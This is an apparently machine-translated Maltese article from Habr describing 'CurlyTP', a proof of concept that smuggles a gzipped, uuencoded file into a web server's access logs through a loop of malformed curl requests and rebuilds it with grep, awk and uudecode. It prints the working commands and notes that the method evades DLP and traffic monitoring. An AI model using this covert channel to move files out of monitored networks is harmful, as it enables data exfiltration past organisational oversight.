Skambju ta' messaġġi sigrieti permezz ta' logs tas-server

Skont id-definizzjoni tal-Wikipedija, qatra mejta hija għodda ta 'konfoffa li sservi għall-iskambju ta' informazzjoni jew xi oġġetti bejn nies li jużaw post sigriet. L-idea hija li n-nies qatt ma jiltaqgħu - iżda xorta jiskambjaw informazzjoni biex iżommu s-sigurtà operattiva.

Il-post tal-ħabi m'għandux jiġbed l-attenzjoni. Għalhekk, fid-dinja offline ħafna drabi jużaw affarijiet diskreti: briks maħlul fil-ħajt, ktieb tal-librerija, jew vojta f'siġra.

Hemm ħafna għodod ta 'kodifikazzjoni u anonimizzazzjoni fuq l-Internet, iżda l-fatt stess li tuża dawn l-għodod jiġbed l-attenzjoni. Barra minn hekk, jistgħu jiġu mblukkati fil-livell korporattiv jew tal-gvern. X'tagħmel?

L-iżviluppatur Ryan Flowers ippropona għażla interessanti - uża kwalunkwe web server bħala ħabi. Jekk taħseb dwarha, x'jagħmel web server? Jirċievi talbiet, joħroġ fajls u jikteb zkuk. U jirreġistra t-talbiet kollha, anke dawk skorretti!

Jirriżulta li kwalunkwe web server jippermettilek li tissejvja kważi kull messaġġ fil-log. Fjuri staqsiet kif tuża dan.

Huwa joffri din l-għażla:

  1. Ħu fajl test (messaġġ sigriet) u kkalkula l-hash (md5sum).
  2. Aħna nikkodifikawh (gzip+uuencode).
  3. Aħna niktbu fil-log billi tuża talba deliberatament żbaljata lis-server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Biex taqra fajl, għandek bżonn twettaq dawn l-operazzjonijiet f'ordni invers: iddekodifika u unzip il-fajl, iċċekkja l-hash (il-hash jista 'jiġi trażmess b'mod sikur fuq kanali miftuħa).

L-ispazji huma sostitwiti bi =+=sabiex ma jkunx hemm spazji fl-indirizz. Il-programm, li l-awtur isejjaħ CurlyTP, juża kodifikazzjoni base64, bħal attachments tal-email. It-talba ssir b'kelma prinċipali ?transfer?sabiex ir-riċevitur ikun jista’ faċilment isibha fir-zkuk.

X'naraw fil-zkuk f'dan il-każ?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kif diġà ssemma, biex tirċievi messaġġ sigriet għandek bżonn twettaq l-operazzjonijiet f'ordni inversa:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Il-proċess huwa faċli biex jiġi awtomatizzat. Md5sum taqbel, u l-kontenut tal-fajl jikkonferma li kollox kien dekodifikat b'mod korrett.

Il-metodu huwa sempliċi ħafna. "Il-punt ta 'dan l-eżerċizzju huwa biss li jipprova li l-fajls jistgħu jiġu ttrasferiti permezz ta' talbiet żgħar tal-web innoċenti, u jaħdem fuq kwalunkwe server tal-web b'logs ta 'test sempliċi. Essenzjalment, kull web server huwa ħabi!” jikteb Flowers.

Naturalment, il-metodu jaħdem biss jekk ir-riċevitur ikollu aċċess għal zkuk tas-server. Iżda tali aċċess huwa pprovdut, pereżempju, minn ħafna hosters.

Kif tużah?

Ryan Flowers jgħid li mhuwiex espert tas-sigurtà tal-informazzjoni u mhux se jikkompila lista ta 'użi possibbli għal CurlyTP. Għalih, hija biss prova ta’ kunċett li l-għodod familjari li naraw kuljum jistgħu jintużaw b’mod mhux konvenzjonali.

Fil-fatt, dan il-metodu għandu numru ta 'vantaġġi fuq "ġlud" oħra ta' server simili Qatra Mejta Diġitali jew PirateBox: ma teħtieġx konfigurazzjoni speċjali fuq in-naħa tas-server jew xi protokolli speċjali - u mhux se tqajjem suspett fost dawk li jimmonitorjaw it-traffiku. Huwa improbabbli li sistema SORM jew DLP tiskennja URLs għal fajls ta' test kompressati.

Dan huwa wieħed mill-modi biex jittrasmettu messaġġi permezz ta 'fajls ta' servizz. Tista 'tiftakar kif xi kumpaniji avvanzati kienu jqiegħdu Impjiegi ta' Żviluppatur f'Headers HTTP jew fil-kodiċi tal-paġni HTML.

Skambju ta' messaġġi sigrieti permezz ta' logs tas-server

L-idea kienet li l-iżviluppaturi tal-web biss jaraw din il-bajda tal-Għid, peress li persuna normali ma tħaresx lejn l-headers jew il-kodiċi HTML.

Skambju ta' messaġġi sigrieti permezz ta' logs tas-server

Sors: www.habr.com

Żid kumment